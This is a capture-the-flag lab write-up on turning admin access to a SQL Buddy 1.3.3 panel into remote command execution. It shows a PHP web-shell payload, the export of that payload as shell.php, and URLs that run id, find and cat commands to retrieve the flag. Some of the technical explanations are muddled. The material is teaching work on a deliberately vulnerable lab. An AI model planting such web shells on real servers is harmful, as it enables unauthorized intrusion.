WEB APP(CTF.

live)
TOPIC NAME: MYSQL-WEB TO SHELL

Web App​: A Web application (Web app) is an application program that is

stored on a remote server and delivered over the Internet through a browser
interface. Web applications can be designed for a wide variety of uses and
can be used by anyone from an organization to an individual for numerous
reasons.

CTF.live​:
CTF stands for Capture The Flag(CTF).CTF is about hacking a deliberately
insecure system intentionally left vulnerable.​A CTF is a game in which
players put their skills to practice to solve problems or break into an
opponent’s system. Below are different types of CTFs​ –
Jeopardy style​: In this variant, players solve certain problems to acquire
“flags”(a specific string of text) to win.
Attack-Defence​: In this type, two teams are created- Red Team (which tries
to breach the system) and Blue Team (which tries to defend the system).

Scenario:
An attacker might get administrative access to a web application. However,
this does not automatically mean that the web server can be compromised. In
some cases where a SaaS application is made available to users.Software as
a service (SaaS) is a software distribution model in which a third-party
provider hosts applications and makes them available to customers over the
Internet and it is routine to give each user admin access to his own instance
of the web application.

Example: Consider an example of a managed hosted Wordpress

site.Managed WordPress hosting is a concierge service where all technical
aspects of running WordPress is managed by the host. This includes
security, speed, WordPress updates, daily backups, website uptime, and
scalability with a single click. In such a scenario, the attacker who will
begin accessing the application as a managed administrative user will have

1
to figure out how to exploit the administrative interface to get a shell on the
server. In some cases, it might be possible to do privilege escalation as
well.The following username and passwords may be used to explore the
application and/or find a vulnerability which might require authenticated
access:

Username - Password
root - <BLANK or NO PASSWORD>

Objective: ​In this challenge, the attacker has administrative access to the
web application and needs to find the flag and exploit the vulnerability.

Procedure:
Open CTF.live.Sign with your Google Account.Then it redirects you to
CTF.Live page.Select the Challenge and open it.Select the Server from the
mentioned servers and click on the Run button.Then we will get a lab
link.Click on the lablink to solve the challenge.
Following is the procedure required to solve the challenge​: Inspect the Web
Application. By inspecting the web application, it creates an ​excellent
solution for people who need to make temporary changes on a web page .

Fig-1:Sql Buddy Login page

2
Search on google “sqlbuddy exploit” and look for publically available
exploits.The exploit db link contains the steps to be followed in order to
exploit the vulnerability.​The Exploit Database is a ​CVE compliant archive
of public exploits and corresponding vulnerable software, developed for use
by penetration testers and vulnerability researchers. The Exploit Database is
a repository for exploits and proof-of-concepts rather than advisories.

Exploit DB Link: ​https://www.exploit-db.com/exploits/35428.

This exploit database of sqlbuddy consists of instructions and the php code
that is necessary to exploit the vulnerability.

​Select the 'app' database on the left panel ​which is mostly used for
unstructured data in situations where the ability of the database to accept
(create) or access (get) large amounts of data quickly is required.

Fig-2:Home page of Sql Buddy

It offers great flexibility with alternative data models ​and Create table 'shell'
with one column named 'shell' of type 'text'.Enter 'shell' in 'Name' text field

3
in ‘CREATE A NEW TABLE’ SECTION. Enter 'shell' in 'Name' text file.

Fig-3:Window to create a New Table

select the type of column as 'text' in the last section.Click on Submit button.

Fig-4:Table is created with a name as Shell.

4
​Inject a PHP payload in the “shell” table Then click on “Insert” tab and
inject the php payload given below in the text field. ​PHP Payload​: ​ <?php
$output=shell_exec($_GET[2]);echo $output;?>. The shell_exec() function
is an inbuilt function in PHP which is used to execute the commands via
shell and return the complete output as a string. $_GET is used to collect
data that is sent in a URL.

Fig-5:Inserting php payload into Shell text.

5
After inserting php payload in the shell text,the data is successfully inserted
into the database as shown in the above figure.Then we have to execute the
shell.php file by exporting it using the export option in sql buddy home page

Fig-6:Executing shell.Php file.

Export the shell table to the 'shell.php' file on the web server. Select the
'CSV'(Comma separated values) option in the 'Format' section which ​allows
data to be saved in a tabular format​.

Select the 'Comma' option in the 'Delimiter' section ​which acts as a field
delimiter in a sequence of comma-separated values​.Then after there are two
types of files in the section or output.They are Browser and Text files. We
have to select the 'Text file' option in 'Output' to section and specify
'shell.php' in the text field.Then click on the Submit button.

After Successful exporting of file into text file,it displays a window showing
that the text file is successfully written to the content file and if you want
you can download it,by pressing the download option and if it is a public
server delete this file from the server after downloading it.

6
 Fig-7:window showing shell.php file was successfully uploaded.

​Execute the php script. Click on the hyperlink which was generated after
exporting the table or navigate to the URL given below:

URL:​http://lhl087247leqkvyd14hrkl6z9.ctf-india.attackdefenselabs.com/exports/shell.ph

Fig-8:Output of shell.php file

7
As no output was returned because the parameter “2” was not passed. ​Pass
the command to be executed in parameter “2” with Command equal to id.
URL:​http://lhl087247leqkvyd14hrkl6z9.ctf-india.attackdefenselabs.com/exports/shell.ph
p?2=id

Fig-9:Output of shell.php when parameter 2 is passed.

The above mentioned URL is used to find the type or data the web server is
running. So the web server is running with www-data users.Then Search for
the flag on the filesystem.
FLAG​: A flag is a string of text which needs to be entered into the website
to show that you have solved the CTF.
● The command required to find the flag is
Command: ​find / -name *flag*
URL:​http://lhl087247leqkvyd14hrkl6z9.ctf-india.attackdefenselabs.com/exports/shell.ph
p?2=find%20/%20-name%20*flag*​.
This URL is used in finding the location where exactly the flag resides.
● The Command required to Retrieve the flag is
Command: ​cat /var/www/flag-77200ece6905f486
URL:​http://lhl087247leqkvyd14hrkl6z9.ctf-india.attackdefenselabs.com/exports/shell.ph
p?2=cat%20/var/www/flag-77200ece6905f4

8
 Fig-10: Flag retrieved.

Flag: ​77200ece6905f48615cd2139090a2e96.

Fig-11:Output of Web to Shell.

9
Conclusion​: The process of ​exploiting web pages has done by using
CTF.live.​The flag is retrieved and verified.The verified Flag shows that this
exploit is successful. Further,this kind of vulnerability and exploiting web
pages can be avoided by using Web application Firewall(WAF), and by
avoiding administrative privileges,validating inputs.

References:

● ​SQL Buddy ( ​SQL Buddy - Web based MySQL administration​ ​).

● SQL Buddy 1.3.3 - Remote Code Execution( ​SQL Buddy 1.3.3 -
Remote Code Execution - PHP webapps​ ​).
● CTF.LIVE
(​https://www.geeksforgeeks.org/what-is-ctfs-capture-the-flag​).

10